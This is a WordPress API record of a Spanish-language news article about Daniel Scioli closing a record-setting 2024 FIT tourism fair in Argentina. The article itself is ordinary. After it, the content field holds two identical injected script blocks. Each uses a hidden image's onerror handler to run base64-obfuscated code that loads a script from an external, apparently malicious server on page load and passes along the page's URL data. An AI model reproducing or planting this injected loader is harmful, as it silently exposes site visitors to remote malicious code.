{"id":4459,"date":"2024-10-02T08:57:11","date_gmt":"2024-10-02T11:57:11","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4459"},"modified":"2025-08-13T23:47:53","modified_gmt":"2025-08-14T02:47:53","slug":"scioli-cerro-una-exitosa-edicion-de-la-fit-con-numeros-record","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4459","title":{"rendered":"Scioli cerr\u00f3 una exitosa edici\u00f3n de la FIT, con n\u00fameros r\u00e9cord"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-e4b225c289fb4a0edd7ea00750cc8db1\" style=\"background-color:#0b6ea6\"><em>\u201cFue un mensaje contundente del sector\u201d, se\u00f1al\u00f3 el Secretario al referirse a la cantidad de visitantes y expositores registrados.<\/em><\/h3>\n\n\n\n<p>La edici\u00f3n 2024 de la&nbsp;<strong>Feria Internacional de Turismo de Am\u00e9rica Latina<\/strong>&nbsp;marc\u00f3 un&nbsp;<strong>nuevo r\u00e9cord con m\u00e1s de 131.000 visitantes<\/strong>, un&nbsp;<strong>4,8 por ciento m\u00e1s<\/strong>&nbsp;que en 2023. Participaron&nbsp;<strong>53 naciones<\/strong>, todas las provincias argentinas,&nbsp;<strong>1.870 expositores<\/strong>&nbsp;y hubo m\u00e1s de&nbsp;<strong>6.000 rondas de negocios, un 39 por ciento m\u00e1s<\/strong>&nbsp;que el a\u00f1o pasado.<\/p>\n\n\n\n<p>\u201c<em>El \u00e9xito de la FIT fue un mensaje contundente del sector, que subraya la importancia del turismo para la econom\u00eda nacional, de su capacidad de generar puestos de trabajo genuinos y sustentables en todo el pa\u00eds y de impulsar el ingreso de divisas<\/em>\u201d, se\u00f1al\u00f3 el secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;<strong>Daniel Scioli<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2024-10-01_at_17.14.45.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u00ab<em>La FIT lo logr\u00f3 de nuevo, lo logramos juntos, superamos todas las expectativas. Esto habla de la m\u00e1quina imparable que es el turismo y de la fuerza arrasadora que tenemos los agentes de viajes como creadores de destinos, oportunidades y nuevos negocios<\/em>\u00ab, dijo&nbsp;<strong>Andr\u00e9s Dey\u00e1<\/strong>, presidente de la&nbsp;<strong>FIT y la FAEVYT<\/strong>&nbsp;(Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo).<\/p>\n\n\n\n<p>En la feria, adem\u00e1s, hubo nuevos sectores &#8211;<strong>FIT Cruceros, FIT Food, FIT Outdoor<\/strong>&#8211; y un renovado&nbsp;<strong>FIT Tech<\/strong>, con un&nbsp;<strong>incremento del 14 por ciento<\/strong>&nbsp;de la superficie total del predio. Se realizaron tambi\u00e9n&nbsp;<strong>174 charlas<\/strong>&nbsp;y presentaciones en los seis auditorios de feria.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2024-10-01_at_17.14.451.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Con respecto a las&nbsp;<strong>rondas de negocios, hubo un total de 6.114<\/strong>&nbsp;durante los dos d\u00edas de actividad comercial, con compradores de doce pa\u00edses (<strong>Bolivia, Brasil, Colombia, Ecuador, M\u00e9xico, Paraguay, Per\u00fa, Uruguay, Chile, Panam\u00e1, Hungr\u00eda y Espa\u00f1a<\/strong>). Adem\u00e1s, participaron&nbsp;<strong>532 empresarios tur\u00edsticos<\/strong>&nbsp;de diversos rubros de la industria -operadores tur\u00edsticos, agencias de viajes, hoteles, prestadoras de servicios, entre otros- que presentaron su oferta para generar oportunidades de venta.<\/p>\n\n\n\n<p>La pr\u00f3xima edici\u00f3n de la Feria Internacional de Turismo de Latino Am\u00e9rica se realizar\u00e1 del&nbsp;<strong>27 al 30 de septiembre de 2025<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/scioli-cerro-una-exitosa-edicion-de-la-fit-con-numeros-record\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:288px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u201cFue un mensaje contundente del sector\u201d, se\u00f1al\u00f3 el Secretario al referirse a la cantidad de visitantes y expositores registrados. La edici\u00f3n 2024 de la&nbsp;Feria Internacional de Turismo de Am\u00e9rica Latina&nbsp;marc\u00f3 un&nbsp;nuevo r\u00e9cord con m\u00e1s de 131.000 visitantes, un&nbsp;4,8 por ciento m\u00e1s&nbsp;que en 2023. Participaron&nbsp;53 naciones, todas las provincias argentinas,&nbsp;1.870 expositores&nbsp;y hubo m\u00e1s de&nbsp;6.000 rondas de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4460,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,21],"tags":[],"class_list":{"0":"post-4459","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4459"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4459"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4459\/revisions"}],"predecessor-version":[{"id":6671,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4459\/revisions\/6671"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4460"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4459"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4459"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4459"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}